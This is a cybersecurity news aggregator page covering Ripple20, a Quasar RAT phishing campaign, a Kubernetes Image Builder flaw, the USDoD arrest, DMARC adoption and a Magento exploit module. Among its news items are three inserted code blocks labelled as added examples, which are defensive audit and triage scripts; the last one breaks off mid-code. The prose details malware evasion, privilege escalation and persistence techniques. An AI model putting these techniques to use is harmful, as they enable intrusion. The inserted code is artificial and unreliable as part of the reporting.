Cyber security aggregate rss news

Cyber security aggregator - feeds history


Cyber News

Cyble's weekly sensor report is an always fascinating look at the vulnerabilities that threat actors are actively exploiting. While new vulnerabilities are quickly exploited, older ones are still exploited with remarkable, if not alarming, frequency. Now before you go blaming grandpa for never updating that five-year-old Windows desktop, you're not going to believe what is consistently the most exploited vulnerability. Or if you work in critical infrastructure cybersecurity, you might not be surprised by the answer.

It's not unusual to see this security vulnerability attacked more than 100,000 times in a given week, but this week Cyble sensors detected a jaw-dropping 411,000 attacks on this one vulnerability, showing that exploitation is growing dramatically over time. It's getting worse, not better.

The vulnerability is CVE-2020-11899, a four-year-old known vulnerability in the Treck TCP/IP stack, which was developed as an IPv6 implementation for the limited space of embedded devices. That means there's a good chance the flaw, which affects Treck TCP/IP versions before 6.0.1.66, is present in any medical, industrial or critical infrastructure device that supports IPv6, and some consumer devices too.

CVE-2020-11899 is an out-of-bounds read vulnerability rated a not-scary 5.4, but when used as part of the "Ripple20" series of vulnerabilities, it can lead to some Halloween levels of scariness. As Ripple20 discoverer JSOF put it: "...data could be stolen off of a printer, an infusion pump behavior changed, or industrial control devices could be made to malfunction. An attacker could hide malicious code within embedded devices for years. One of the vulnerabilities could enable entry from outside into the network boundaries; and this is only a small taste of the potential risks."

With potentially hundreds of millions of IoT, IIoT and embedded devices affected by the vulnerabilities, including some consumer devices, it's a software supply chain vulnerability on steroids. CISA's Ripple20 advisory, just updated last month, lists 17 prominent industrial, medical and critical infrastructure device manufacturers as potentially affected by the vulnerabilities.

As those devices are also difficult to update, mitigations may be the best that many organizations can do to control risk in this case. We'll look at what organizations can do to protect themselves from this very active exploit, along with the deplorable state of IoT security and hopes for improvement.

The Most Exploited Vulnerability and IoT Security

2024 could mark a turning point for the better for IoT security, with the EU Cyber Resilience Act and the UK Product Security and Telecommunications Infrastructure (PSTI) Regulations taking effect and initiatives underway in several other countries, but the new rules and laws will do little for the millions, if not billions, of older devices that remain vulnerable and exposed to physical and cyber attacks.

There are many reasons why IoT devices often harbor known vulnerabilities. Some have reached end-of-life (EOL) and are too integral or expensive to replace. Some must operate continuously, presenting daunting logistical challenges for patch management. Others are physically remote, or part of a vast network of different operating systems and configurations, many of them non-standard, that make updating nearly impossible. And some were never meant to be exposed to the internet, with connected functionality added as an afterthought.

In a blog post yesterday, Lesley Carhart, director of incident response at OT/ICS security company Dragos, noted positive changes in operational technology awareness even as the challenges remain daunting. "We frequently see Windows 2003 or older operating systems," Carhart wrote. "There is little ability to safely use modern forensic agents broadly in most environments. Everything centers around life and safety."

What might be most striking about Carhart's post is the number of environments that have had known compromises for years.

"We have seen an increase in customers with an interest in scoping and creating removal plans for long-term infections (think, 5-10 years) and architectural compromises of their industrial environments," Carhart wrote. "Safe industrial operation requirements make it extremely challenging to do mass clean-up and reimaging efforts in process facilities. Many facilities have maintained a level of infection and compromise for years and deemed it too costly or high risk to conduct mitigation activities. However, these points of compromise can cause eventual operational and technical impact, in an unpredictable way. Interest has increased in understanding the scale of the problem and 'projectizing' removal in a safe way."

While Carhart sees the new awareness as positive, what's troubling for those unfamiliar with OT security is how many have not only accepted the risk of unpatched devices, but may have also accepted the compromises that come with that. Whatever the reasons, there may be billions of internet-facing IoT devices with vulnerabilities, and possibly millions that are already infected. What's an OT organization to do?

IoT Security Practices and Controls

There may be little an already-infected organization can do short of costly cleanup (if you're in critical infrastructure, CISA may be able to offer free help), but there are steps that all organizations with critical IoT devices can take to limit damage and access. Start with an inventory of IoT devices so you'll understand the scope of the problem. Patch where possible, and reach out to vendors for more information if needed. If a device doesn't need to be exposed to the internet, make sure it isn't, and disable any unnecessary ports, services and protocols.

Carhart notes one major problem: "ineffective DMZ boundaries between Enterprise and OT." That's best fixed by strong network segmentation and microsegmentation, and "zero trust" policies that limit access and permissions to only what a role requires. Segmentation can be done even within the OT network itself if some parts are more sensitive than others. The vast majority of IoT traffic is unencrypted, so encrypting it is a control that should be high on most organizations' priority lists. Firewalls, intrusion detection, network monitoring and even VPNs are better controls than many have in place now. Default passwords and user names should be changed if they haven't been, and multi-factor authentication (MFA) should be added wherever possible. JSOF's initial advisory listed 31 vendors affected by Ripple20, including big names like Dell, Cisco and HP/HPE, so OT environments need to assess their own inventory. Tenable built a Nessus plugin based on scripts in JSOF's work and whitepapers.


Firewall Daily

Recent research by the Cyble Research and Intelligence Lab (CRIL) has brought to light a sophisticated multi-stage malware attack orchestrated by a Vietnamese threat actor. This campaign specifically targets job seekers and digital marketing professionals, employing various advanced tactics, including the use of Quasar RAT, which gives attackers full control over compromised systems.

The attack appears to originate from spam emails that contain phishing attachments. These emails are designed to entice recipients into opening an archive file that houses an LNK file masquerading as a PDF document. The sequence of events begins with the execution of the LNK file, which carries PowerShell commands intended to download highly obfuscated scripts from external sources. This strategy aims to bypass traditional detection methods, particularly in non-virtualized environments.

The Quasar RAT Campaign by Vietnamese Threat Actor

Once the environment is verified to be free from analysis tools, the attackers decrypt the payload using hardcoded keys. This step activates Quasar RAT, enabling the threat actors to gain extensive access to the infected systems, facilitating data exfiltration and the potential deployment of additional malware.

[Figure: Execution flow of the campaign (Source: Cyble)]

In July 2022, the Vietnamese threat actor intensified its operations by disseminating Ducktail malware specifically aimed at digital marketing professionals. The group later expanded its arsenal to include other types of malware, notably information stealers and remote access trojans (RATs). The attackers also leveraged Malware-as-a-Service (MaaS) frameworks to create more versatile and scalable campaigns.

"This campaign is attributed to a Vietnamese threat group based on various indicators, including target selection, attack tools, and the delivery of malicious payloads," CRIL noted. These elements align closely with tactics used in previous campaigns identified by cybersecurity experts, reinforcing the suspicion of organized cybercriminal activity.

The Mechanics of the Attack

The initial phase of the malware attack involves a malicious LNK file that executes PowerShell commands to download an additional script hosted on Dropbox. The download and execution of that script are carried out through the Invoke-RestMethod (irm) and Invoke-Expression (IEX) PowerShell commands.

Once the PowerShell script is executed, it decodes a lure PDF file and a batch file, storing them in the Downloads folder under the names "PositionApplied_VoyMedia.pdf" and "output.bat." The script then launches both files using the Start-Process command.

The primary target of this sophisticated campaign appears to be professionals in the digital marketing, e-commerce, and performance marketing sectors, particularly those focused on Meta (Facebook, Instagram) advertising in the United States. The lure documents used in the attack have been crafted to appeal specifically to this demographic, increasing the likelihood of engagement.

Virtual Machine Evasion Techniques

One of the hallmark features of this multi-stage malware attack is its focus on evading detection by identifying whether it is operating within a virtual machine environment. The "output.bat" file uses Windows Management Instrumentation Command-line (WMIC) commands to determine the disk drive type and manufacturer, checking for signatures that indicate a virtual machine, such as "DADY HARDDISK" or manufacturers like "QEMU" and "VirtualBox."

If the environment is identified as virtual, the script exits to avoid detection. If not, it continues executing the obfuscated PowerShell script, bypassing many of the security measures in place.

Decryption and Execution

The PowerShell script also includes a decryption phase in which it extracts base64-encoded strings from the "output.bat" file. These strings are decrypted with AES using hardcoded keys, then decompressed through a GZip stream. This process yields a .NET executable that runs in memory and conducts further detection-evasion checks.

Advanced Checks for Virtual Environments

The malware employs an intricate series of checks to determine whether it is running in a sandbox or virtual environment. These methods include:

- Checking for specific file names related to virtualization software like VMware and Parallels.
- Inspecting for the presence of particular DLL modules that are characteristic of sandboxing solutions.
- Measuring time discrepancies in system tick counts to detect emulated environments.

If any of these checks indicate a virtual or sandboxed environment, the malware triggers an exception, halting further execution to avoid detection.

Privilege Escalation and Persistence

Upon successful execution, the malware checks for administrative privileges. If the executable lacks these rights, it modifies its environment to gain elevated privileges using PowerShell commands or COM object invocations. Following privilege escalation, the malware copies itself to a hidden folder in the Windows directory and ensures it runs automatically on startup by modifying the Windows registry.

Defense Evasion Strategies

The malware's evasion techniques extend beyond initial execution. It modifies key Windows functions to disable event tracing, thereby obscuring its presence from security monitoring tools. The malware also encrypts and compresses sensitive data, including its payload, to further disguise its operations.

Deployment of Quasar RAT

The final stage of the attack involves the execution of Quasar RAT, which has been adapted to reduce its detectability. This version of Quasar RAT is capable of executing a range of malicious tasks, including data theft and remote control of the infected system.

Quasar RAT is configured with various parameters, including specific host addresses, startup keys, and log directories, all of which are integral to its operation. The modification of its attributes helps it avoid attribution and detection, allowing the Vietnamese threat group to operate with greater anonymity.


Firewall Daily

Microsoft has revealed that its customers are subjected to over 600 million cybercriminal and nation-state cyberattacks daily. These threats encompass a broad spectrum of malicious activities, from ransomware and phishing to identity theft. The recent findings in the fifth annual Microsoft Digital Defense Report highlight a troubling trend: nation-state actors are collaborating with cybercriminals, utilizing their tools and methods for various cyber operations, including espionage and influence campaigns.

The Rise of Nation-State Cyberattacks

Covering July 2023 through June 2024, the report highlights how state-affiliated threat actors are leveraging cybercriminal networks for their own objectives. This collaboration is particularly evident in operations targeting Ukraine, where Russian actors have reportedly outsourced cyberespionage efforts to criminal groups. In June 2024, a cybercrime syndicate used widely available malware to infiltrate at least 50 Ukrainian military devices, showcasing the direct impact of nation-state cyberattacks on military security.

Iranian cyber operations have also adapted to the geopolitical climate, with state actors employing ransomware as a tool for influence. In one instance, Iranian hackers marketed stolen data from an Israeli dating site, offering to remove specific profiles for a fee. This melding of cybercrime with state objectives illustrates a new frontier in cyber operations, where financial gain and espionage intersect.

North Korea has entered the ransomware arena as well, with a newly identified actor developing a variant dubbed FakePenny. This ransomware was deployed against organizations in the aerospace and defense sectors, exemplifying a dual motive of intelligence gathering and profit.

Geopolitical Context of Cyber Operations

The report emphasizes that nation-state cyberattacks are concentrated around active conflict zones and regions of political tension. In addition to the United States and the United Kingdom, cyber threats have been directed at Israel, Ukraine, the United Arab Emirates, and Taiwan. For example, approximately 75% of Russian cyber operations targeted Ukraine or NATO member states, highlighting Moscow's interest in gathering intelligence on Western responses to its actions. Iran's focus has intensified following the outbreak of the Israel-Hamas war, directing cyber resources towards Israel, the United States, and Gulf nations perceived as supportive of Israel.

Domestic Disruption and Election Interference

As geopolitical tensions rise, so does the threat of domestic disruption. Microsoft reports that Russia, Iran, and China are exploiting ongoing conflicts to create discord within the United States, particularly as the nation approaches a pivotal election. These state actors are seeking to influence public opinion and undermine confidence in the electoral process, employing tactics that range from propaganda to cyber operations designed to manipulate political narratives.

The use of homoglyph domains (spoofed links often used for phishing) has surged, with Microsoft monitoring over 10,000 such threats aimed at impersonating legitimate entities. This indicates not only a rising tide of cybercriminal activity but also the strategic reconnaissance efforts by nation-state actors to achieve their political ends.

Financially Motivated Cybercrime on the Rise

Despite the ominous threat posed by nation-state cyberattacks, financially motivated cybercrime remains a persistent concern. Over the past year, Microsoft documented a staggering 2.75-fold increase in ransomware attacks, although there was a notable decrease in incidents where attacks progressed to the encryption stage. The primary tactics employed by these cybercriminals include social engineering, with email phishing remaining a predominant method.

Tech scams have experienced a dramatic surge of 400% since 2022, indicating a growing vulnerability in digital environments. With malicious infrastructure often remaining active for less than two hours, the rapid turnover emphasizes the need for dynamic and agile cybersecurity measures.

Both cybercriminals and nation-state actors are increasingly utilizing artificial intelligence to enhance their operations. While generative AI has the potential to improve cybersecurity responses, it is also being exploited to create more sophisticated phishing attacks and influence operations. For instance, actors linked to China are leveraging AI-generated imagery, while Russian affiliates are utilizing audio-focused AI.

The Path Forward: Collaboration and Deterrence

The staggering volume of attacks, over 600 million daily targeting Microsoft customers, highlights the urgent need for comprehensive and collaborative cybersecurity measures. Effective deterrence can be achieved through both denial of intrusions and imposing consequences for malicious behavior. Microsoft is committed to protecting its customers through initiatives like the Secure Future Initiative, which aims to enhance defense strategies.

To counteract the advantage currently held by cyber adversaries, both the public and private sectors must work together to establish and enforce international norms for behavior in cyberspace. While significant progress has been made in discussing these norms, meaningful consequences for violations are still lacking. Strengthening these frameworks will be essential in reducing the volume and aggression of nation-state cyberattacks.


Firewall Daily

A new security risk has emerged in the Kubernetes Image Builder, posing a critical threat to organizations that use this tool to build node images for their containerized environments. The Kubernetes Image Builder vulnerability, tracked as CVE-2024-9486, has been assigned a CVSS score of 9.8, indicating its severity. If exploited, this vulnerability in Kubernetes Image Builder could allow unauthorized users to gain root access to nodes under specific circumstances, creating potential chaos in affected systems.

Overview of the Kubernetes Image Builder Vulnerability

Discovered by security researcher Nicolai Rybnikar, this critical flaw allows default credentials to remain enabled during the image-building process. Joel Smith from Red Hat elaborated on the issue, stating, "A security issue was discovered in the Kubernetes Image Builder where default credentials are enabled during the image build process. Additionally, virtual machine images built using the Proxmox provider do not disable these default credentials, which means that nodes using these images may be accessible through these credentials."

The implications of this vulnerability in Kubernetes Image Builder are profound. Clusters that use virtual machine images built with the Image Builder project and its Proxmox provider are at risk, as these images may provide attackers with the credentials needed to gain root access. This can lead to unauthorized control over the nodes, impacting the integrity and security of the entire Kubernetes cluster.

Affected Versions

The Kubernetes Image Builder vulnerability specifically affects versions 0.1.37 and earlier. Clusters utilizing these versions with the Proxmox provider are particularly susceptible. In contrast, images built with other providers do not share this vulnerability, although related issues may exist (as referenced in issue #128007). With a critical CVSS score of 9.8, this vulnerability in Kubernetes Image Builder can have severe implications, affecting not just the immediate security of clusters but also their operational integrity. Organizations are urged to update to the latest version of the Image Builder, implement the recommended mitigation strategies, and continuously monitor their systems to protect against potential threats.

Mitigation Steps

Organizations must take proactive measures to address the Kubernetes Image Builder vulnerability. First and foremost, rebuild any affected images using a patched version of the Image Builder. Version 0.1.38 rectifies the vulnerability and introduces two significant changes: it sets a randomly generated password for the duration of the image build and disables the builder account upon completion.

In the interim, organizations can mitigate the risk by disabling the builder account on affected virtual machines, which can be done by running the command usermod -L builder.

For ongoing security, administrators should routinely check for any logins to the builder account, using the command last builder.

If evidence of exploitation is discovered, report it immediately to security@kubernetes.io. Taking these steps will help organizations protect their environments against potential threats.

Conclusion

The CVE-2024-9486 vulnerability in the Kubernetes Image Builder highlights the critical importance of maintaining sound security practices in containerized environments. With a CVSS score of 9.8, this vulnerability poses a serious risk, particularly for organizations using affected versions with the Proxmox provider. Immediate action is essential: upgrading to version 0.1.38 is a necessary step to safeguard systems from unauthorized access and potential chaos. Additionally, implementing the recommended mitigation strategies and conducting regular security audits will help strengthen defenses against this and future vulnerabilities.
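As an added illustration (not the Kubernetes project's tooling and not part of the advisory), the POSIX shell helper below checks a node for the state the mitigation steps describe: whether the builder account exists, whether it is locked (which is what usermod -L does), and how many logins last(1) has recorded for it. The passwd and shadow file paths and the ACCOUNT name are parameters so the checks can also be run against constructed copies.

```shell
#!/bin/sh
# Audit helper for the CVE-2024-9486 mitigation: is the "builder" account
# present, is it locked, and has anyone logged in to it?
# Added example, not the Kubernetes Image Builder project's own code.

ACCOUNT="${ACCOUNT:-builder}"

# account_exists PASSWD_FILE USER -> exit 0 if USER has an entry.
account_exists() {
    grep -q "^$2:" "$1"
}

# account_locked SHADOW_FILE USER -> exit 0 if password login is disabled.
# "usermod -L" prefixes the hash with "!"; "*" likewise means no password
# login. An account with no shadow entry counts as locked (nothing to use).
account_locked() {
    pwfield=$(awk -F: -v u="$2" '$1 == u { print $2 }' "$1")
    if [ -z "$pwfield" ]; then
        return 0
    fi
    case "$pwfield" in
        '!'*|'*'*) return 0 ;;
        *)         return 1 ;;
    esac
}

# login_count USER: reads "last USER" output on stdin and prints how many
# session lines name USER (the trailing "wtmp begins ..." line is skipped).
login_count() {
    awk -v u="$1" '$1 == u { n++ } END { print n+0 }'
}

# audit_builder_account [PASSWD_FILE] [SHADOW_FILE] -> exit 0 when the
# account is absent or locked and has no recorded logins.
audit_builder_account() {
    passwd_file="${1:-/etc/passwd}"
    shadow_file="${2:-/etc/shadow}"
    if ! account_exists "$passwd_file" "$ACCOUNT"; then
        echo "OK: no '$ACCOUNT' account in $passwd_file"
        return 0
    fi
    if account_locked "$shadow_file" "$ACCOUNT"; then
        echo "OK: '$ACCOUNT' exists but is locked"
        locked=0
    else
        echo "WARN: '$ACCOUNT' is enabled; disable it with: usermod -L $ACCOUNT"
        locked=1
    fi
    n=$(last "$ACCOUNT" 2>/dev/null | login_count "$ACCOUNT")
    echo "INFO: $n login(s) to '$ACCOUNT' recorded by last(1)"
    [ "$locked" -eq 0 ] && [ "$n" -eq 0 ]
}

# Run the audit against the live system only when asked (reading
# /etc/shadow needs root): sh audit.sh --run
if [ "${1:-}" = "--run" ]; then
    audit_builder_account
fi
```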


Firewall Daily

Law enforcement agencies have revealed a massive crackdown on illegal football gambling, resulting in over 5,100 arrests and the recovery of more than USD 59 million in illicit proceeds. This operation, known as SOGA X, was executed from June to July 2024 and involved a collaborative effort from INTERPOL alongside 28 countries and territories. The timing of the operation was strategic, coinciding with the UEFA 2024 European Football Championship, a period expected to see an increase in betting activities, particularly from organized crime groups profiting from illegal football gambling.

The Scale of Illegal Football Gambling

The global illegal gambling market is estimated to be worth a staggering USD 1.7 trillion, according to research from the Asian Racing Federation. This shadowy sector is often intertwined with various forms of criminal activity, including human trafficking, money laundering, and fraud. The SOGA X operation not only targeted illegal online football gambling but also aimed to dismantle the networks supporting these criminal enterprises, highlighting the extensive connections between sports betting and broader criminal activities.

During this operation, authorities successfully shut down thousands of illegal gambling websites and initiated investigations that led to the rescue of trafficked individuals and the exposure of sophisticated money laundering schemes. For instance, a notable case in the Philippines saw local authorities, with INTERPOL's assistance, dismantle a scam center linked to a licensed gambling operation.

Human Trafficking Victims Rescued

In the Philippines, the SOGA X operation resulted in the rescue of over 650 human trafficking victims, comprising nearly 400 Filipinos and more than 250 foreign nationals from six different countries. Many of these individuals were misled into believing they had secured legitimate employment, only to find themselves trapped through threats and intimidation. They were forced to work for the legal gambling site while simultaneously managing illegal cyber scams, such as romance fraud and cryptocurrency-related schemes.

An INTERPOL Operational Support Team played a crucial role in this operation, providing expertise in extracting and analyzing forensic evidence from seized devices. Their efforts were instrumental in tracing illicit financial flows and identifying victims and suspects across different jurisdictions.

Significant Arrests Across Asia

The reach of SOGA X extended beyond the Philippines. In Vietnam, where online gambling is illegal for citizens, authorities dismantled a complex gambling ring that processed an astonishing USD 800,000 in daily transactions. This syndicate utilized servers located in various countries, employing an intricate network of bank accounts and e-wallets to facilitate illegal betting and payouts.

In Thailand, police conducted raids on two major illegal betting sites, leading to the arrest of key ringleaders. They also seized assets valued at over USD 9 million. Similarly, in Greece, law enforcement agencies took down an organized crime group that manipulated the betting landscape using fake accounts. This group managed a staggering 3,000 fake and "mule" accounts on legal gambling platforms across Greece, Cyprus, and Spain, employing stolen identity documents and sophisticated techniques to disguise their operations.

Interconnected Criminal Activities

SOGA X was a coordinated effort with INTERPOL, with vital support from various international organizations, including the Asia-Pacific Expert Group on Organized Crime (APEG) and the INTERPOL Match Fixing Task Force (IMFTF). Stephen Kavanagh, INTERPOL's Executive Director of Police Services, emphasized the importance of global information sharing in combating the intricate networks of organized crime. "Organized crime networks reap huge profits from illegal gambling, which is often intertwined with corruption, human trafficking, and money laundering," he stated.

The implications of illegal football gambling extend beyond mere financial loss; they are also closely linked to match-fixing, where criminals manipulate sports outcomes to secure guaranteed profits. The ongoing investigations from SOGA X aim to disrupt these manipulative practices and uphold the integrity of sports.

Conclusion

Operation SOGA X saw participation from a diverse array of countries, including Australia, Belgium, Greece, Vietnam, and more. Each jurisdiction contributed to a collective effort to combat the rising tide of illegal gambling activities that threaten to undermine the integrity of sports and public safety. As investigations continue, the ramifications of this operation are likely to resonate throughout the global landscape of online gambling. Law enforcement agencies are not only focusing on immediate arrests but also on dismantling the underlying infrastructure that supports illegal football gambling.


Cyber News

Boston Children's Health Physicians (BCHP), a multi-specialty healthcare group providing pediatric care across Connecticut and New York, recently notified patients and staff of a significant data breach following a cyberattack. The BCHP cyberattack, which stemmed from an IT vendor's systems, compromised sensitive information belonging to current and former employees, patients, and guarantors. The healthcare organization, which employs over 300 clinicians, emphasized that it quickly responded to the incident, implementing its incident response protocols as soon as the breach was discovered.

Timeline of the BCHP Cyberattack

The cyberattack on BCHP occurred on September 6, 2024, when BCHP's IT vendor identified unusual activity on its systems. Four days later, on September 10, BCHP discovered that an unauthorized third party had gained access to parts of its network. This unauthorized party managed to exfiltrate certain files from the organization's network, triggering a swift response. BCHP immediately shut down its systems as a precautionary measure and launched an investigation with the help of a third-party forensic firm. The healthcare provider has since taken steps to enhance the security of its systems and prevent further incidents of this nature. However, the damage had already been done, with files containing sensitive information being compromised during the breach.

Data Exposed in the BCHP Data Breach

The compromised files contained a wide range of sensitive data, including names, Social Security numbers, billing details, addresses, driver's license numbers, medical record numbers, and health insurance information. The BCHP data breach affected not only patients but also current and former employees, as well as guarantors linked to the organization. While BCHP confirmed that its electronic health records (EHR) were on a separate network and remained unaffected by the cyberattack, the breadth of the exposed data is significant. The organization has since begun notifying affected individuals and has offered complimentary credit monitoring and protection services to those whose Social Security or driver's license numbers were involved in the breach.

BianLian Group Claims Responsibility

The BianLian cyberthreat group, a well-known ransomware gang, has claimed responsibility for the BCHP cyberattack. This group has been linked to several high-profile cyberattacks targeting critical infrastructure. In May 2023, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) issued a joint alert warning entities about BianLian's methods and the potential consequences of falling victim to their ransomware campaigns.

[Image: Source: X]

BianLian has been particularly active in 2024, with data from cybersecurity research firm Comparitech indicating the group has claimed responsibility for 60 confirmed ransomware attacks this year alone. In BCHP's case, the group allegedly exfiltrated the stolen files and may have demanded a ransom to prevent the further dissemination of the compromised data. However, BCHP has not publicly commented on any ransom demands or whether it engaged with the cybercriminals.

BCHP's Response and Next Steps

In a public statement posted on its website, BCHP acknowledged the breach and detailed the steps it is taking to mitigate its impact. According to the statement, the organization began notifying affected individuals via mail starting on October 4, 2024. BCHP has also set up a dedicated toll-free hotline to address concerns and answer questions from those potentially affected. BCHP encouraged individuals whose information was compromised to monitor their healthcare billing statements and report any unauthorized charges to their insurers immediately. For those affected, particularly those whose sensitive personal information was involved, the organization has offered complimentary credit monitoring and credit protection services.

To further strengthen its cybersecurity posture, BCHP has implemented additional safeguards designed to protect and monitor its systems against future cyberattacks. The healthcare provider has not revealed the specific measures but noted that the investigation into the breach is ongoing.

Brazil Arrests ‘US ...

 A Little Sunshine

Brazilian authorities reportedly have arrested a 33-year-old man on suspicion of being “USDoD,” a prolific cybercriminal who rose to infamy in 2022 after infiltrating the FBI’s InfraGard program and leaking contact information for 80,000 members. More recently, USDoD was behind a breach at the consumer data broker National Public Data that led to the leak of Social Security numbers and other personal information for a significant portion of the U.S. population.

[Image: USDoD’s InfraGard sales thread on Breached.]

The Brazilian news outlet TV Globo first reported the news of USDoD’s arrest, saying the Federal Police arrested a 33-year-old man from Belo Horizonte. According to TV Globo, USDoD is wanted domestically in connection with the theft of data on Brazilian Federal Police officers. USDoD was known to use the hacker handles “Equation Corp” and “NetSec,” and according to the cyber intelligence platform Intel 471, NetSec posted a thread on the now-defunct cybercrime community RaidForums on Feb. 22, 2022, in which they offered the email address and password for 659 members of the Brazilian Federal Police.

TV Globo didn’t name the man arrested, but the Portuguese-language tech news outlet Tecmundo published a report in August 2024 that named USDoD as 33-year-old Luan BG from Minas Gerais, Brazil. Tecmundo said it learned the hacker’s real identity after being given a draft of a detailed, non-public report produced by the security firm CrowdStrike. CrowdStrike did not respond to a request for comment. But a week after Tecmundo’s piece, the tech news publication hackread.com published a story in which USDoD reportedly admitted that CrowdStrike was accurate in identifying him. Hackread said USDoD shared a statement, which was partially addressed to CrowdStrike:

[Image: A recent statement by USDoD, after he was successfully doxed by CrowdStrike and other security firms. Image: Hackread.com]

In August 2024, a cybercriminal began selling Social Security numbers and other personal information stolen from National Public Data, a private data broker in Florida that collected and sold SSNs and contact data for a significant slice of the American population. Additional reporting revealed National Public Data had inadvertently published its own passwords on the Internet. The company is now the target of multiple class-action lawsuits, and recently declared bankruptcy. In an interview with KrebsOnSecurity, USDoD acknowledged stealing the NPD data earlier this year, but claimed he was not involved in leaking or selling it.

In December 2022, KrebsOnSecurity broke the news that USDoD had social-engineered his way into the FBI’s InfraGard program, an FBI initiative designed to build informal information sharing partnerships with vetted professionals in the private sector concerning cyber and physical threats to critical U.S. national infrastructure. USDoD applied for InfraGard membership using the identity of the CEO of a major U.S. financial company. Even though USDoD listed the real mobile phone number of the CEO, the FBI apparently never reached the CEO to validate his application, because the request was granted just a few weeks later. After that, USDoD said he used a simple program to collect all of the contact information shared by more than 80,000 InfraGard members.

The FBI declined to comment on reports about USDoD’s arrest.

In a lengthy September 2023 interview with databreaches.net, USDoD told the publication he was a man in his mid-30s who was born in South America and who holds dual citizenship in Brazil and Portugal. Toward the end of that interview, USDoD said they were planning to launch a platform for acquiring military intelligence from the United States.

Databreaches.net told KrebsOnSecurity USDoD has been a regular correspondent since that 2023 interview, and that after being doxed USDoD made inquiries with a local attorney to learn if there were any open investigations or charges against him. “From what the lawyer found out from the federal police, they had no open cases or charges against him at that time,” Databreaches.net said. “From his writing to me and the conversations we had, my sense is he had absolutely no idea he was in imminent danger of being arrested.”

When KrebsOnSecurity last communicated with USDoD via Telegram on Aug. 15, 2024, they claimed they were “planning to retire and move on from this,” referring to multiple media reports that blamed USDoD for leaking nearly three billion consumer records from National Public Data. Less than four days later, however, USDoD was back on his normal haunt at BreachForums, posting custom exploit code he claimed to have written to attack recently patched vulnerabilities in a popular theme made for WordPress websites.

Time to Get Strict W ...

 Feed

Adoption of the email authentication and policy specification remains low, and only about a tenth of DMARC-enabled domains enforce policies. Everyone is waiting for major email providers to get strict.
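What “enforcing a policy” means in DNS terms: a DMARC record with p=none only asks receivers for reports, while p=quarantine or p=reject tells them to act on failing mail, and a pct= below 100 or sp=none reopens part of that gap. The following is an added example (not code from the article or from any DMARC tool) that parses constructed records for placeholder domains and classifies each one; tag semantics follow RFC 7489.

```python
"""Classify DMARC records by how strictly they actually enforce a policy.

Added example for this page, not code from the article. The records below are
constructed and the domains are placeholders. Tag meanings follow RFC 7489:
p= is the policy receivers apply to the domain, sp= the policy for subdomains
(defaults to p=), and pct= the percentage of failing messages the policy
covers (defaults to 100).
"""

VALID_POLICIES = {"none", "quarantine", "reject"}

# Constructed sample records keyed by a hypothetical domain (not real DNS data).
SAMPLE_RECORDS = {
    "monitor.example": "v=DMARC1; p=none; rua=mailto:dmarc@monitor.example",
    "partial.example": "v=DMARC1; p=reject; pct=20; rua=mailto:dmarc@partial.example",
    "subdom.example": "v=DMARC1; p=reject; sp=none; rua=mailto:dmarc@subdom.example",
    "strict.example": "v=DMARC1; p=quarantine; rua=mailto:dmarc@strict.example",
    "broken.example": "v=spf1 include:_spf.broken.example -all",
}


def parse_dmarc(txt):
    """Parse a DMARC TXT record into a {tag: value} dict.

    Raises ValueError for anything that is not a syntactically usable DMARC
    record: the first tag must be v=DMARC1 and a valid p= tag must be present.
    """
    parts = [p.strip() for p in txt.split(";") if p.strip()]
    if not parts or parts[0].replace(" ", "").upper() != "V=DMARC1":
        raise ValueError("not a DMARC record: first tag must be v=DMARC1")
    tags = {}
    for part in parts[1:]:
        if "=" not in part:
            raise ValueError(f"malformed tag: {part!r}")
        name, value = part.split("=", 1)
        tags[name.strip().lower()] = value.strip()
    if tags.get("p", "").lower() not in VALID_POLICIES:
        raise ValueError("missing or invalid p= tag")
    if "sp" in tags and tags["sp"].lower() not in VALID_POLICIES:
        raise ValueError("invalid sp= tag")
    if "pct" in tags and (not tags["pct"].isdigit() or not 0 <= int(tags["pct"]) <= 100):
        raise ValueError("pct= must be an integer between 0 and 100")
    return tags


def enforcement(tags):
    """Return 'monitor-only', 'partial' or 'enforcing'.

    'enforcing' means quarantine or reject applies to all failing mail for the
    domain and its subdomains. pct= below 100 or sp=none leaves a gap that a
    sender spoofing the domain (or a subdomain of it) can still slip through.
    """
    policy = tags["p"].lower()
    if policy == "none":
        return "monitor-only"
    subdomain_policy = tags.get("sp", policy).lower()
    pct = int(tags.get("pct", "100"))
    if pct < 100 or subdomain_policy == "none":
        return "partial"
    return "enforcing"


def classify_all(records):
    """Map each domain to its enforcement class, or 'invalid' if unparsable."""
    result = {}
    for domain, txt in records.items():
        try:
            result[domain] = enforcement(parse_dmarc(txt))
        except ValueError:
            result[domain] = "invalid"
    return result


def enforcing_share(records):
    """Fraction of valid DMARC records that are fully enforcing (0.0 to 1.0)."""
    classes = [c for c in classify_all(records).values() if c != "invalid"]
    return sum(c == "enforcing" for c in classes) / len(classes) if classes else 0.0


if __name__ == "__main__":
    for domain, cls in classify_all(SAMPLE_RECORDS).items():
        print(f"{domain:20} {cls}")
    print(f"enforcing share: {enforcing_share(SAMPLE_RECORDS):.0%}")
```

In practice the TXT record comes from a DNS query for `_dmarc.<domain>`. The parser is deliberately strict: a record that is not exactly DMARC (here an SPF record published in the wrong place) counts as invalid rather than silently as monitor-only, which is also how receivers treat it.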

 Feed

This Metasploit module chains an arbitrary file read in Magento (CVE-2024-34102, an XML external entity injection flaw) with a buffer overflow in glibc's iconv() (CVE-2024-2961) to gain unauthenticated remote code execution on Magento Open Source and Adobe Commerce. Versions affected include 2.4.7 and earlier, 2.4.6-p5 and earlier, 2.4.5-p7 and earlier, and 2.4.4-p8 and earlier; older releases are also exploitable where the installed PHP and glibc versions are themselves vulnerable.
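Whether a given install falls inside that affected range depends on the patch suffix, not just the release number, and a naive string comparison gets it wrong ("2.4.6-p10" sorts before "2.4.6-p5"). The following is an added example, not part of the Metasploit module or of Magento, that parses Magento version strings and triages a constructed inventory against the four release lines listed above; treating releases older than 2.4.4 as "needs a PHP/glibc check" is an assumption drawn from the sentence above.

```python
"""Triage Magento / Adobe Commerce version strings against the affected range
quoted above for CVE-2024-34102 + CVE-2024-2961.

Added example for this page, not part of the Metasploit module or of Magento.
The thresholds come only from the sentence "2.4.7 and earlier, 2.4.6-p5 and
earlier, 2.4.5-p7 and earlier, and 2.4.4-p8 and earlier"; the sample inventory
is constructed.
"""
import re

# Highest affected patch level on each release line. 0 means the unpatched
# base release (e.g. plain 2.4.7) is the last affected build on that line.
LAST_AFFECTED = {
    (2, 4, 7): 0,
    (2, 4, 6): 5,
    (2, 4, 5): 7,
    (2, 4, 4): 8,
}
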